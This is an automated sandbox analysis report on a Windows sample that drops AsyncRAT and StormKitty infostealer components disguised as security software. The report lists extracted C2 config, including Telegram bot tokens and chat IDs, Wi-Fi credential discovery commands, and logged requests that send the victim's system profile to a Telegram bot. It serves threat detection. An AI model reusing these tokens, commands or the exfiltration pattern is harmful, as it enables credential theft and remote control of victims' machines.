Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/01/2025, 00:46 UTC

General

  • Target

    2025-01-25_6ad6bb9ff2600d6e03aeea4d5aaae235_icedid.exe

  • Size

    2.0MB

  • MD5

    6ad6bb9ff2600d6e03aeea4d5aaae235

  • SHA1

    e5c72c1a2a35e01b1e9d64cf7991d86abc88cce5

  • SHA256

    047b76675a633db72c428f5c79a6b5ca5c7b3a6fbebbb7de5ec495e4cb1857af

  • SHA512

    d3da5954fb81e8d4f50fc16ff89c5627de0c3e7e2e393b3dbd4d27293ba3e1b388e92a0585a5dd9df6a10561fcd519f014b90a5257d7c2c606de21fc001db770

  • SSDEEP

    24576:SGyEQkGMex01TGQ0U7dr0hYmwFRbKOdzzmh3xtJ5GfsZOu17s:SGrdomllYOpcxckfs

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Drops desktop.ini file(s) 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-25_6ad6bb9ff2600d6e03aeea4d5aaae235_icedid.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-25_6ad6bb9ff2600d6e03aeea4d5aaae235_icedid.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4468
    • C:\Users\Admin\AppData\Roaming\Aws SMTPS Cracker Private.exe
      "C:\Users\Admin\AppData\Roaming\Aws SMTPS Cracker Private.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe
        "C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:232
        • C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe
          "C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe"
          4⤵
          • Executes dropped EXE
          • Drops desktop.ini file(s)
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:460
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1972
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              6⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:2704
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4348
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1632
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2156
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              6⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4000
      • C:\Users\Admin\AppData\Roaming\Windows Security.exe
        "C:\Users\Admin\AppData\Roaming\Windows Security.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1264
        • C:\Users\Admin\AppData\Roaming\Windows Security.exe
          "C:\Users\Admin\AppData\Roaming\Windows Security.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:4704
      • C:\Users\Admin\AppData\Roaming\crack.exe
        "C:\Users\Admin\AppData\Roaming\crack.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp81B3.tmp.cmd""
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4872
          • C:\Windows\SysWOW64\timeout.exe
            timeout 4
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2204
    • C:\Users\Admin\AppData\Roaming\HeartSender.exe
      "C:\Users\Admin\AppData\Roaming\HeartSender.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:772

Network

  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    106.27.33.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    106.27.33.23.in-addr.arpa
    IN PTR
    Response
    106.27.33.23.in-addr.arpa
    IN PTR
    a23-33-27-106.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    api.telegram.org
    Windows Defender Security.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP
    crack.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sat, 25 Jan 2025 00:46:23 GMT
    Content-Type: application/json
    Content-Length: 250
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    17.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.173.78.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.173.78.104.in-addr.arpa
    IN PTR
    Response
    167.173.78.104.in-addr.arpa
    IN PTR
    a104-78-173-167.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    icanhazip.com
    Windows Defender Security.exe
    Remote address:
    8.8.8.8:53
    Request
    icanhazip.com
    IN A
    Response
    icanhazip.com
    IN A
    104.16.185.241
    icanhazip.com
    IN A
    104.16.184.241
  • flag-us
    GET
    http://icanhazip.com/
    Windows Defender Security.exe
    Remote address:
    104.16.185.241:80
    Request
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 25 Jan 2025 00:46:36 GMT
    Content-Type: text/plain
    Content-Length: 15
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=xcTo2JlupiCEauqBZ9xTtN0Wbv0ulV9wg57j_U3h_y4-1737765996-1.0.1.1-h69Na0z2fZgDOG02kzmPp8XOCV60KyK3krb8iu6PKf2z5Yb2zQ1WLv1e4MknCzbLGDcKtjSHFQIhGg2xsPtcDg; path=/; expires=Sat, 25-Jan-25 01:16:36 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 90743f478dc0ed06-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    api.mylnikov.org
    Windows Defender Security.exe
    Remote address:
    8.8.8.8:53
    Request
    api.mylnikov.org
    IN A
    Response
    api.mylnikov.org
    IN A
    104.21.44.66
    api.mylnikov.org
    IN A
    172.67.196.114
  • flag-us
    GET
    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=56:58:e1:33:14:43
    Windows Defender Security.exe
    Remote address:
    104.21.44.66:443
    Request
    GET /geolocation/wifi?v=1.1&bssid=56:58:e1:33:14:43 HTTP/1.1
    Host: api.mylnikov.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 25 Jan 2025 00:46:37 GMT
    Content-Type: application/json; charset=utf8
    Content-Length: 88
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Cache-Control: max-age=2678400
    CF-Cache-Status: MISS
    Last-Modified: Sat, 25 Jan 2025 00:46:37 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDjsfFSRD1vM4oPO94N6ADZePYOvMOO%2FP2hKOtpeT65DERqiNYFa8x0jF1KZ7grIChwF1njkRgObU0OEuqUs6mClfx0XT0pkBiB8ogHQLt98aNoh1c0fvjp85EeD6oKy8nLm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=0; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 90743f48fc7a93e6-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=28734&min_rtt=26797&rtt_var=8991&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2989&recv_bytes=412&delivery_rate=126220&cwnd=253&unsent_bytes=0&cid=0982215e036b3da8&ts=319&x=0"
  • flag-us
    DNS
    241.185.16.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.185.16.104.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-25%2012:46:23%20AM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OFGADUSE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.240%0AExternal%20IP:%20181.215.176.83%0ABSSID:%2056:58:e1:33:14:43%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True
    Windows Defender Security.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-25%2012:46:23%20AM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OFGADUSE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.240%0AExternal%20IP:%20181.215.176.83%0ABSSID:%2056:58:e1:33:14:43%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 25 Jan 2025 00:46:38 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-nl
    GET
    https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...
    Windows Defender Security.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
    Host: api.telegram.org
    Response
    HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 25 Jan 2025 00:46:39 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    66.44.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    66.44.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    21.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    21.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    85.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    85.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    74.239.69.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.239.69.13.in-addr.arpa
    IN PTR
    Response
  • 149.154.167.220:443
    https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP
    tls, http
    crack.exe
    866 B
    6.9kB
    9
    11

    HTTP Request

    GET https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP

    HTTP Response

    200
  • 127.0.0.1:3389
    crack.exe
  • 104.16.185.241:80
    http://icanhazip.com/
    http
    Windows Defender Security.exe
    339 B
    709 B
    6
    4

    HTTP Request

    GET http://icanhazip.com/

    HTTP Response

    200
  • 104.21.44.66:443
    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=56:58:e1:33:14:43
    tls, http
    Windows Defender Security.exe
    814 B
    4.5kB
    9
    9

    HTTP Request

    GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=56:58:e1:33:14:43

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...
    tls, http
    Windows Defender Security.exe
    2.6kB
    7.2kB
    13
    13

    HTTP Request

    GET https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-25%2012:46:23%20AM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OFGADUSE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.240%0AExternal%20IP:%20181.215.176.83%0ABSSID:%2056:58:e1:33:14:43%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True

    HTTP Response

    401

    HTTP Request

    GET https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

    HTTP Response

    401
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    106.27.33.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    106.27.33.23.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    Windows Defender Security.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    17.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    17.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    167.173.78.104.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    167.173.78.104.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    icanhazip.com
    dns
    Windows Defender Security.exe
    59 B
    91 B
    1
    1

    DNS Request

    icanhazip.com

    DNS Response

    104.16.185.241
    104.16.184.241

  • 8.8.8.8:53
    api.mylnikov.org
    dns
    Windows Defender Security.exe
    62 B
    94 B
    1
    1

    DNS Request

    api.mylnikov.org

    DNS Response

    104.21.44.66
    172.67.196.114

  • 8.8.8.8:53
    241.185.16.104.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    241.185.16.104.in-addr.arpa

  • 8.8.8.8:53
    66.44.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    66.44.21.104.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    21.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    21.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    85.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    85.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    144 B
    158 B
    2
    1

    DNS Request

    43.229.111.52.in-addr.arpa

    DNS Request

    43.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    74.239.69.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    74.239.69.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\0bc93425a1886bc80ecfe1f12a8c70bd\Admin@OFGADUSE_en-US\System\Process.txt

    Filesize

    4KB

    MD5

    19bfb3ef58c362da8e82663e5739ed26

    SHA1

    e3da88e39ab9776c70d4127c66fc9c1318861c0d

    SHA256

    8834cec7916793f4466b658ec217baa357b88f2c647951ef846c13cb916b0fa6

    SHA512

    89a67baa9e660b2cc7302162e3e796172c992c6a590731dc4477b9bcbdaf74c0cf6b11f4473d9e7ec5880a86b8a0ef334a05dd8813c20c924785cd9ca9c6c542

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Windows Defender Security.exe.log

    Filesize

    507B

    MD5

    76ffb2f33cb32ade8fc862a67599e9d8

    SHA1

    920cc4ab75b36d2f9f6e979b74db568973c49130

    SHA256

    f1a3724670e3379318ec9c73f6f39058cab0ab013ba3cd90c047c3d701362310

    SHA512

    f33502c2e1bb30c05359bfc6819ca934642a1e01874e3060349127d792694d56ad22fccd6c9477b8ee50d66db35785779324273f509576b48b7f85577e001b4e

  • C:\Users\Admin\AppData\Local\Temp\tmp81B3.tmp.cmd

    Filesize

    151B

    MD5

    bccf948888cc446951f479d0240fb840

    SHA1

    732560e0c4daaca64aca9802ef8aa8f04706619f

    SHA256

    cba79a061f9a5d1ebb4d9915c52fc82605867e33f5bbebcb7c502f16e91bb049

    SHA512

    92621bafb6aba59fd884b02af550609f01a501894cf5e2ae316e38077696883b3dec4d36520f7df1e83dc900f886d60f03633433edd56c6183b95a804369c30d

  • C:\Users\Admin\AppData\Local\fd9baa011740292f8dbb56ac9dd59708\msgid.dat

    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

  • C:\Users\Admin\AppData\Roaming\Aws SMTPS Cracker Private.exe

    Filesize

    461KB

    MD5

    c3a6f6cdb3188010a0b230ddc987c01e

    SHA1

    c267acc2bf367a7ad783a5536b79528911e92fee

    SHA256

    f23c10b8274afc4aaf02bdacaa8f4f1db375cb221c12a1d3c3cec993dc00561a

    SHA512

    3861517e38e16160e976ba05af87c8c808c182fc47b4de93202b5822cbb0be01bcb62290503871061b3774222f00c748f743eb5febb86064e642c66fc8393eac

  • C:\Users\Admin\AppData\Roaming\HeartSender.exe

    Filesize

    1.5MB

    MD5

